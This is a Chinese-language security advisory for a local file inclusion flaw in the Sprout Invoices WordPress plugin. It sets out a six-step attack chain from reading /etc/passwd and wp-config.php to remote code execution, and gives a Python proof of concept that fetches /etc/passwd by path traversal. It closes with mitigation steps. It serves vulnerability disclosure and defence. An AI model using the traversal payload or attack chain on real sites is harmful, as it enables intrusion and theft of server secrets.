CVE-2026-32401: Sprout Invoices插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2026-32401

漏洞类型

本地文件包含(LFI)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Sprout Invoices插件（BoldGrid Client Invoicing by Sprout Invoices）

漏洞概述

CVE-2026-32401是WordPress插件Sprout Invoices（又称BoldGrid Client Invoicing by Sprout Invoices）中存在的一个高危安全漏洞，CVSS评分7.2。该漏洞属于PHP本地文件包含（Local File Inclusion, LFI）类型，源于插件对文件包含操作缺乏适当的输入验证和访问控制。攻击者可利用此漏洞通过构造恶意请求，包含并执行服务器上的本地PHP文件，从而可能导致敏感信息泄露、源代码暴露或进一步进行远程代码执行攻击。此漏洞影响插件20.8.9及之前的所有版本，攻击复杂度低，但需要高权限认证。由于PHP文件包含函数的特性，即使目标文件不是PHP格式，攻击者也可通过文件包含配合日志污染或上传图片等方式实现任意代码执行。

技术细节

该漏洞存在于Sprout Invoices插件的文件包含逻辑中，具体表现为对include/require语句中使用的文件名参数缺乏充分的验证和过滤。攻击者可以通过构造特殊的文件路径参数（如使用路径遍历字符../或绝对路径）来包含服务器上的任意本地文件。在PHP中，include和require语句会执行指定文件中的代码，因此攻击者可通过包含恶意构造的文件实现代码执行。漏洞利用条件包括：1）攻击者需具有WordPress站点的高权限账户；2）能够访问插件的相关功能模块；3）目标服务器需启用allow_url_include（针对远程文件包含）或存在可利用的本地文件路径。典型的攻击路径为：攻击者登录后台，找到存在漏洞的文件包含点，构造包含/etc/passwd或日志文件等敏感文件的payload，验证文件包含成功后再尝试通过写入恶意代码到可访问的文件（如上传目录中的图片文件），最后包含该文件实现远程代码执行。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标WordPress站点，确认安装了Sprout Invoices插件且版本<=20.8.9

STEP 2

步骤2

认证获取：攻击者获取WordPress站点的高权限账户（如管理员）凭据

STEP 3

步骤3

漏洞探测：访问存在漏洞的文件包含功能点，构造路径遍历payload测试LFI

STEP 4

步骤4

敏感文件读取：通过包含/etc/passwd、wp-config.php等文件验证漏洞并获取敏感信息

STEP 5

步骤5

代码执行准备：利用文件包含特性，将恶意PHP代码写入可访问的文件（如上传目录中的图片文件或日志文件）

STEP 6

步骤6

远程代码执行：通过文件包含功能包含已植入恶意代码的文件，在服务器上执行任意命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-32401 PoC - Sprout Invoices LFI
# Target: WordPress site with vulnerable Sprout Invoices plugin (<=20.8.9)

target = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com"

# Path to vulnerable endpoint (example path, actual path may vary)
vulnerable_path = "/wp-admin/admin.php?page=si_invoice&action=view&invoice_id=../../../../../../etc/passwd"

url = f"{target}{vulnerable_path}"

# Basic authentication for high privilege account
auth = ("admin_username", "admin_password")

print(f"[*] Testing CVE-2026-32401 on {target}")
print(f"[*] Target URL: {url}")

try:
    response = requests.get(url, auth=auth, timeout=10)
    
    if "root:" in response.text or "daemon:" in response.text:
        print("[+] VULNERABLE! Local file inclusion confirmed")
        print("[+] Extracted content:")
        print(response.text[:500])
    elif response.status_code == 200:
        print("[?] Possible LFI - Manual verification needed")
    else:
        print("[-] Not vulnerable or target not reachable")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

Sprout Invoices (Client Invoicing by Sprout Invoices) <= 20.8.9

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时措施：1）临时禁用Sprout Invoices插件直到安全补丁发布；2）限制该插件的访问权限，仅允许受信任的管理员使用；3）通过Web服务器配置阻止对可疑文件包含请求的访问；4）启用服务器的PHP安全模式和相关安全限制；5）实施严格的访问控制策略，确保WordPress后台认证安全，使用强密码和双因素认证。